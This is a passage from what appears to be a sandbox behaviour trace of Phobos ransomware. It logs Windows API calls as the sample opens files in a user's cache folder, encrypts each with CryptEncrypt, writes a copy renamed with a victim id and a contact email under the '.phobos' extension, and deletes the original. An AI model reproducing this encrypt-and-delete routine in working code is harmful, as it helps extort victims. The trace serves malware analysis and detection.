(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.167] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.167] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.168] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.168] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.168] ReadFile (in: hFile=0x140, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1ec, lpOverlapped=0x0) returned 1 [0198.168] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1f0, dwBufLen=0x1f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1f0) returned 1 [0198.168] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1f0, lpOverlapped=0x0) returned 1 [0198.169] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32b68) returned 1 [0198.169] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.169] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.169] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.169] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.169] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.170] CloseHandle (hObject=0x140) returned 1 [0198.170] CloseHandle (hObject=0x15c) returned 1 [0198.170] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001")) returned 1 [0198.170] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.171] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=416) returned 1 [0198.171] CloseHandle (hObject=0x15c) returned 1 [0198.171] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852")) returned 0x2024 [0198.171] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.172] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.172] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.172] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.172] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.172] ReadFile (in: hFile=0x15c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1a0, lpOverlapped=0x0) returned 1 [0198.173] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1b0, dwBufLen=0x1b0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1b0) returned 1 [0198.173] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1b0, lpOverlapped=0x0) returned 1 [0198.174] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32b68) returned 1 [0198.174] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.174] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.174] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.174] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.174] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.174] CloseHandle (hObject=0x15c) returned 1 [0198.174] CloseHandle (hObject=0x140) returned 1 [0198.175] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852")) returned 1 [0198.175] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.176] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=416) returned 1 [0198.176] CloseHandle (hObject=0x140) returned 1 [0198.176] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8")) returned 0x2024 [0198.176] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.176] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.176] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.177] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.177] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.177] ReadFile (in: hFile=0x140, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1a0, lpOverlapped=0x0) returned 1 [0198.178] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1b0, dwBufLen=0x1b0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1b0) returned 1 [0198.178] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1b0, lpOverlapped=0x0) returned 1 [0198.178] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32b68) returned 1 [0198.178] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.178] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.178] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.178] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.179] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.179] CloseHandle (hObject=0x140) returned 1 [0198.179] CloseHandle (hObject=0x15c) returned 1 [0198.179] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8")) returned 1 [0198.180] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.180] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=516) returned 1 [0198.180] CloseHandle (hObject=0x15c) returned 1 [0198.180] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150")) returned 0x2024 [0198.180] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.181] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.181] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.181] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.181] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.181] ReadFile (in: hFile=0x15c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x204, lpOverlapped=0x0) returned 1 [0198.186] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x210, dwBufLen=0x210 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x210) returned 1 [0198.186] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x210, lpOverlapped=0x0) returned 1 [0198.187] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa329e8) returned 1 [0198.187] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.187] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.187] CryptDestroyKey (hKey=0xa329e8) returned 1 [0198.187] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.187] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.187] CloseHandle (hObject=0x15c) returned 1 [0198.187] CloseHandle (hObject=0x140) returned 1 [0198.187] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150")) returned 1 [0198.188] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.189] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=516) returned 1 [0198.189] CloseHandle (hObject=0x140) returned 1 [0198.189] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc")) returned 0x2024 [0198.189] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.189] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.189] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.190] CryptImportKey (in: 